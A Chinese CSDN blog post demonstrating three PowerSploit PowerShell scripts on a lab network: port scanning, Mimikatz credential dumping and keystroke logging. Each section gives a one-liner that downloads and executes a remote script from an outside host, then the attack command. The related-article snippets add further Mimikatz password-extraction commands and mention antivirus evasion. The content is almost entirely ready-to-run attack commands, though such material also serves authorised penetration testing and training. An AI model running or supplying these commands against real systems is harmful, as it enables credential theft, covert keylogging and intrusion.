Invoke-Portscan、Invoke-Mimikatz、Get-Keystrokes

最新推荐文章于 2024-04-23 22:00:47 发布
最新推荐文章于 2024-04-23 22:00:47 发布
阅读量482 收藏 1
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46104215/article/details/121212477
版权

一、Invoke-Portscan

Recon 模块的一个脚本,主要用于端口扫描

1.下载脚本

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Recon/Invoke-Portscan.ps1")

2.扫描

Invoke-Portscan -Hosts 192.168.110.130, 192.168.110.142 -Ports "80,22,4444"

二、Invoke-Mimikatz

Exfiltration 模块的脚本,获取 Hash

1.下载

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1")

2.执行,需要管理员权限

Invoke-Mimikatz -DumpCreds

三、Get-Keystrokes

Exfiltration 模块的脚本,用于键盘记录,功能强大;不仅键盘输入记录,甚至能记录鼠标的点击情况,还能记录详细的时间,实战可以直接放入后台运行

1.下载

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Exfiltration/Get-Keystrokes.ps1")

2.开启键盘记录

Get-Keystrokes -LogPath c:\win-test\write.txt

3.随意输入,如 “i want to try”

 

 

橙汁水
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Invoke-Mimikatz.ps1脚本使用
墨痕诉清风的博客
05-31 507
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"' //获取密码。有时当获得权限时无法使用mimikatz.exe时,可以考虑使用Invoke-Mimikatz.ps1脚本获取想要的数据。Import-Module .\Invoke-Mimikatz.ps1 //导入命令。Set-ExecutionPolicy Unrestricted //打开限制。
Invoke-Mimikatz.ps1
01-06
Invoke-Mimikatz.ps1
powersploit Invoke-Portscan模块
u013930899的博客
05-07 471
1. Invoke-Portscan模块 Invoke-Portscan是Recon模块下的一个脚本,主要用于端口扫描。 2. 在目标机上下载portscan脚本 PS C:\Users\Administrator> IEX (New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/Recon/Invoke-Portscan.ps1") 3. 运行脚本扫描 ...
PowerSploit
最新发布
sinat_25635183的博客
04-23 1316
PowerSploit是一套用于PowerShell的开源渗透测试工具集,旨在帮助安全专业人员评估和增强Windows环境的安全性。它包含了各种模块和技术,可用于执行各种攻击和渗透测试任务,如权限提升、横向移动、信息收集等。PowerShell脚本模块:PowerSploit提供了一系列PowerShell脚本,用于执行各种渗透测试任务。这些脚本包括各种攻击技术,如Shellcode执行、凭据盗窃、权限提升等。Mimikatz模块。
PowerSploit的使用
浅笑996的博客
03-26 646
Invoke-Mimikatz(依赖管理员) Import-Module .\invoke-mimikatz.ps1 Invoke-Mimikatz –DumpCreds 使用Invoke-Mimikatz –command “mimikatz命令”来执行命令: Invoke-Mimikatz –command "token::elevate" Invoke-Ninjacopy (依赖管理...
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 1803
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
PowerShell 安全专题之攻击检测篇
weixin_34041003的博客
09-25 1398
本文讲的是PowerShell 安全专题之攻击检测篇,PowerShell 从诞生至今,已经被大多数攻击者滥用在了各种攻击场景中,如内网渗透,APT攻击甚至包括现在流行的勒索软件中。PS之所以被广泛的“滥用”在攻击中,就是因为PS的功能强大且调用方式十分灵活。随着利用PS进行攻击的趋势愈演愈烈,掌握有效的防御和检测PS攻击的方法是十分有必要的。 Pow...
Invoke-WCMDump-master1.rar
06-10
使用 Invoke-WCMDump 加powershell 获取windows凭证密码 使用文档地址:https://blog.csdn.net/caperxi/article/details/117775522
Invoke-ARPScan.ps1
04-04
Invoke-ARPScan.ps1
react-native-invoke-app:将 React Native App 从 Headless JS 带到前台
05-30
0.60$ react-native link react-native-invoke-app用法 import invokeApp from 'react-native-invoke-app' ;// Within your headless functioninvokeApp ( ) ;高级用法您可以将对象传递给invokeApp方
Invoke-WCMDump结合powershell进行密码获取
03-26
Ivoke-WCMDump 什么是Credential Manager ...从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 ...Invoke-WCMDump
Invoke-Mimikatz.txt
03-01
Invoke-Mimikatz
PowerShell攻击指南
鸡蛋炒鸡蛋
03-03 3956
什么是powershell?可以简单理解为cmd.exe的扩展。powershell具有灵活性和功能化管理windows系统的能力,powershell脚本文件后缀名是.ps1(数字1)Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的windows版本中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。
内网渗透中mimikatz的使用
热门推荐
pyphrb的博客
07-28 4万+
0x01 简介mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单0x02 测试环境网络资源管理模式:域 已有资源:域内一台主机权限 操作系统:win7 x64 域权限:普通用户0x03 测试目标1、获得域控权限 2、导出所有用户口令 3、维持域控权限0x04 测试过程1、获取本机信息mimikatz:privilege::debug sekurlsa::logonpas
萌新如何玩转mimikatz
m0_71745484的博客
02-13 5836
mimikatz就是我遇见的一个坎
powershell + Invoke-Mimikatz.ps1获取系统密码
大方子
10-29 5942
参照:https://blog.51cto.com/simeon/2126106 进行实现 Invoke-Mimikatz.ps1下载地址 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 (1)目标主机具备网络环境 power...
通过xencrypt免杀invoke-mimikatz.ps1
网络安全。
03-03 1581
0x01 简介 xencrypt目前测试只在windows 2012 powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。 0x02 使用 1、下载invoke-mimikatz.ps1到同级目录下。 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exf...
Invoke-Mimikatz.ps1获取系统密码
weixin_34357267的博客
06-07 963
(1)Invoke-Mimikatz.ps1下载地址https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1(2)具备网络环境直接执行命令powershell "IEX (New-Object Net.WebClient).DownloadString('...
PowerSploit脚本攻击实战
bring_coco的博客
01-24 1009
环境 kali(192.168.188.128) win7(192.168.188.148) 前提 1.输入git命令安装PowerSploit 命令:git clone https://github.com/PowerShellMafia/PowerSploit 演示: 2.输入以下命令开启Apache服务 命令:service apache2 start 演示: 3.把下载好的文件夹移动到var/www/html目录,搭建一个简易的服务器 介绍PowerSploit各模块的功能 1.Antivi
invoke-custom 指令是什么
06-12
invoke-custom 是 Java 虚拟机中一种比较特殊的指令,它是用于实现动态语言和函数式编程语言的重要机制之一。 在 Java 8 之前,Java 语言并没有对函数式编程提供原生的支持。但是,Java 8 引入了 Lambda 表达式和方法引用等语言特性,从而使得 Java 语言也具备了一定程度的函数式编程能力。而为了支持这些新特性,Java 8 还引入了一个新的指令 invokeDynamic,它可以在运行时动态地绑定方法实现。而 invoke-custom 指令则是 invokeDynamic 的一种特殊形式,它用于将一个方法调用绑定到一个特定的方法实现上。 具体来说,当虚拟机遇到 invoke-custom 指令时,它会根据指令中的参数动态地绑定一个方法实现,并将该方法实现作为一个函数对象返回。然后,程序可以像调用普通的方法一样调用这个函数对象,从而实现动态语言和函数式编程语言中的一些高级特性,比如闭包、柯里化和惰性求值等。 需要注意的是,由于 invoke-custom 指令比较复杂,它只能在支持 Java 7 及以上版本的虚拟机中使用。而在 Android 平台上,只有在 API 级别 26 及以上的版本中才支持 invoke-custom 指令。这也就是为什么在低于 Android O 的版本上使用 invoke-custom 指令会导致错误的原因。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值